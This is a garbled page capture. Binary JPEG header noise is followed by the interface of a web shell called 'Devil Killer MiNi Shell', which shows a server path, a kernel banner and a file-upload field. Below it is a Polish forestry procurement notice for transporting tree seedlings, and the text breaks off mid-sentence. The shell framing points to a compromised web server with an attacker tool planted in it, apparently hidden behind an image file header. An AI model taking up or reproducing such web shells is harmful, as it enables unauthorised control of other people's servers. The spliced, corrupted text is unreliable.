JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210322/0002110701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00021107 z dnia 2021-03-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Transport sadzonek z zakrytym systemem korzeniowym w ilości około 4 195 000 sztuk </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PGL LP Nadleśnictwo Dobrzejewice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 870530000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zawały 101</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobrzejewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-123</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566742500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dobrzejewice@torun.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_dobrzejewice/zamowienia_publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Transport sadzonek z zakrytym systemem korzeniowym w ilości około 4 195 000 sztuk </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-34dd11a8-8b11-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00021107</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_dobrzejewice/zamowienia_publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_dobrzejewice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">regulaminy i instrukcje korzystania z platformy zakupowej Open Nexushttps://platformazakupowa.plznajdują się pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający informuje, iż administratorem danychosobowych jest Nadleśnictwo Dobrzejewice. Inspektorem ochrony danych osobowych w NadleśnictwieDobrzejewice jest Pan Patryk Makowski, adres e-mail: iod@comp-net.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.3.21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 237575,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest transport sadzonek z zakrytym systemem korzeniowym w łącznej ilości około 4 195 000 sztuk.3.2.	Szczegółowe wymagania dotyczące:	Wymagania transportowe: dwa samochody ciężarowe z zakrytą skrzynią załadowczą lub odkryty pod warunkiem, że Wykonawca zabezpieczy na własny koszt transport koszy z sadzonkami folią stretch, wyposażone w żurawik lub windę załadowczą, mogące przewieźć jednorazowo co najmniej 10 koszy transportowych o wymiarach: Szerokość - 2,08 m, Wysokość – 2,10 m, Głębokość – 1,15 m;	Oszacowana liczba kilometrów (zawiera dojazd do miejsc docelowych z sadzonkami w koszach transportowych oraz powrót z pustymi koszami):Wiosna 2021: 1780 km,Jesień 2021: 31340 km.Wiosna 2022: 3430 km	Transport musi być ubezpieczony na koszt wykonawcy;	Miejsce wysyłki oraz miejsce przeznaczenia określa załącznik nr 6 do niniejszej SIWZ z zastrzeżeniem, że szczegółowe miejsca rozładunku , znajdujące się na terenie Nadleśnictwa będącego miejscem docelowym będą podane nie później niż w dniu załadunku i może znajdować się w miejscu do którego dojazd będzie możliwy wyłącznie drogami leśnymi (Rozładunek bezpośrednio na pozycje nasadzeń);	Liczba kursów oraz szacunkową liczbę kilometrów do miejsc przeznaczenia określa załącznik nr 7 do niniejszej SIWZ.3.3.	Wymóg zatrudnienia na umowę o pracę;Zamawiający stosownie do art. 29 ust. 3a ustawy, wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1* ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy.Wykonawca lub podwykonawca zatrudni wyżej wymienione osoby na okres realizacji zamówienia. W przypadku rozwiązania stosunku pracy przed zakończeniem tego okresu, zobowiązuje się do niezwłocznego zatrudnienia na to miejsce innej osoby.*art. 22 § 1 ustawy z dnia 26 czerwca 1976 r. –Kodeks pracy: Przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca -do zatrudniania pracownika za wynagrodzeniem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca zobowiązany jest podać w Ofercie (załącznik nr 1 do SWZ)łączną cenę za wykonanie całości przedmiotu zamówienia. 2. Cena za wykonanie przedmiotuzamówienia ma charakter ryczałtowy, w związku z tym cena oferty winna uwzględnić wszystkie koszty iskładniki związane z wykonaniem zamówienia, uwzględniać cały zakres przedmiotu.3. Cenę ofertynależy podać liczbowo i słownie. 4. Ceny muszą być podane w złotych polskich, z dokładnością dodwóch miejsc po przecinku, przy czym należy przyjąć zasadę, że końcówki poniżej 5 pomija się, zaśkońcówki równe i powyżej 5 należy zaokrąglić w górę.. 5. Stawkę podatku od towarów i usług (VAT)należy uwzględnić w wysokości obowiązującej na dzień składania ofert.6. Wykonawca, składającofertę, obowiązany jest poinformować Zamawiającego (w Ofercie – załącznik nr 1 do SWZ), czy wybóroferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego zgodnie zprzepisami o podatku od towarów i usług, wskazując nazwę (rodzaj) towaru lub usługi, których dostawalub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.Brak wskazania w formularzu Oferty (załącznik nr 1 do SWZ) informacji czy wybór oferty będzieprowadzić do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatkuod towarów i usług będzie uznawane jako informacja, że wybór oferty wykonawcy nie będzie prowadzićdo powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów iusług.7. Rozliczenia między Zamawiającym a Wykonawcą nie będą prowadzone w walucie obcej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału wpostępowaniu dotyczące:1) zdolności do występowania w obrocie gospodarczymZamawiającynie formułuje warunku udziału w postępowaniu w odniesieniu do występowania w obrociegospodarczym. 2) uprawnień do prowadzenia określonej działalności gospodarczej lubzawodowejZamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu dowarunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej lubzawodowej. 3) sytuacji ekonomicznej lub finansowejZamawiający nie formułuje warunku udziałuw postępowaniu w odniesieniu do sytuacji ekonomicznej i finansowej. 4) zdolności technicznejlub zawodowejWarunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że wokresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzeniadziałalności jest krótszy – w tym okresie): wykonał, a w przypadku świadczeńpowtarzających się lub ciągłych – wykonuje co najmniej 2 usługi, których przedmiotem byłtransport sadzonek z zakrytym systemem korzeniowym o wartości pojedynczej usługi niemniejszej niż 30.000,00 zł brutto (słownie: trzydzieści tysięcy złotych 00/100), 2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie zformułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach ioświadczeniach, o których mowa w rozdziale 8.3. W przypadku Wykonawców wspólnieubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 7.1.powinni spełniać łącznie wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt. 7.1.ppkt 4) lit. a) winien spełnić co najmniej jeden z tych Wykonawców. Żaden z Wykonawcówwspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu zpostępowania.4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacjizawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówieniamogą polegać na zdolnościach tych wykonawców, którzy wykonają usługi, do realizacji którychte zdolności są wymagane. W przypadku, o którym mowa w pkt 7.1. ppkt 4) lit. a) SWZ,Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,z którego wynika, które usługi wykonają poszczególni Wykonawcy. 5. Wykonawca może w celupotwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościachtechnicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotówudostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunkówprawnych. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lubdoświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,jeśli podmioty te wykonają usługi, do realizacji, których te zdolności są wymagane.6. Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116ust. 2 PZP w zw. z art. 266 PZP może, na każdym etapie postępowania, uznać, że Wykonawcanie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów,w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inneprzedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizacjęzamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1. Zamawiający przedudzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, któregooferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminieaktualnych na dzień złożenia następujących podmiotowych środków dowodowych:a) oświadczeniaWykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupykapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekstjedn. Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę lubofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz zdokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowejniezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczeniaWykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tejgrupy kapitałowej stanowi załącznik nr 8 do SWZ),b) odpisu lub informacji z Krajowego RejestruSądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisywymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W celu wstępnego potwierdzenia braku podstaw do wykluczenia zpostępowania, o których mowa w pkt 6.1. i 6.3 oraz w celu potwierdzenia spełniania warunków udziałuw postępowaniu, o których mowa w pkt 7.1 SWZ Wykonawca składa wraz z ofertą oświadczenia, októrych mowa w art. 125 ust. 1 PZP, tj. wstępne oświadczenie o spełnianiu warunków udziału,sporządzone zgodnie ze wzorem stanowiącym załącznik nr 2a do SWZ oraz wstępne oświadczenie obraku podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym załącznik nr 2 do SWZ.2. W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1.Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwieWykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:a)wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych równieżwykonywanych, w okresie ostatnich 3 lat od dnia w którym upływa termin składania ofert, a jeżeli okresprowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości brutto, przedmiotu(rodzaju wykonanych usług), dat wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) ipodmiotów, na rzecz których usługi zostały wykonane lub są wykonywane (wzór wykazu wykonanychusług stanowi załącznik nr 9 do SWZ),Jeżeli Wykonawca powołuje się na doświadczenie w realizacjiusług, wykonanych wspólnie z innymi wykonawcami, wykaz dotyczy usług, w których wykonaniuwykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych,w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. b) dowody określające, czywskazane przez Wykonawcę usługi na potwierdzenie spełnienia warunku udziału w postępowaniu dot.zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub są wykonywanenależycie.Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przezpodmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lubciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanieuzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lubciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonaniepowinny być wystawione w okresie ostatnich 3 miesięcy liczonych wstecz od dnia w którym upływatermin składania ofert. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia(konsorcjum): 1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawcówwspólnie ubiegających się o udzielenie zamówienia;2) oferta musi być podpisana w taki sposób,by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzieleniezamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treśćpełnomocnictwa powinna dokładnie określać zakres umocowania;3) oświadczenie, o którymmowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się ozamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunkówudziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianiewarunków udziału w postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających sięo udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, wformie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisemosobistym.4) dokumenty, o których mowa w pkt 8.3. obowiązany będzie złożyć każdy zwykonawców wspólnie ubiegających się o udzielenie zamówienia5) dokumenty, o których mowaw pkt 8.2. lit. a, c i d wykonawcy wspólnie ubiegający się o zamówienie składają wspólnie,natomiast dokumenty, o których mowa w pkt 8.2. lit. b i e składa ten z wykonawców wspólnieubiegających się o udzielenie zamówienia, który wykazuje spełnienie warunku udziału wpostępowaniu, do którego wykazania służy dany dokument; 6) wszyscy Wykonawcy wspólnieubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanieumowy;7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośródsiebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań,otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkichpartnerów;8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonaniaumowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się oudzielenie zamówienia łącznie lub każdego z osobna.9) Zamawiający informuje o treści przepisuart. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia,kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzieleniezamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, dorealizacji których te zdolności są wymagane.W związku z powyższym Wykonawca jestzobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, zktórego wynika, które usługi wykonają 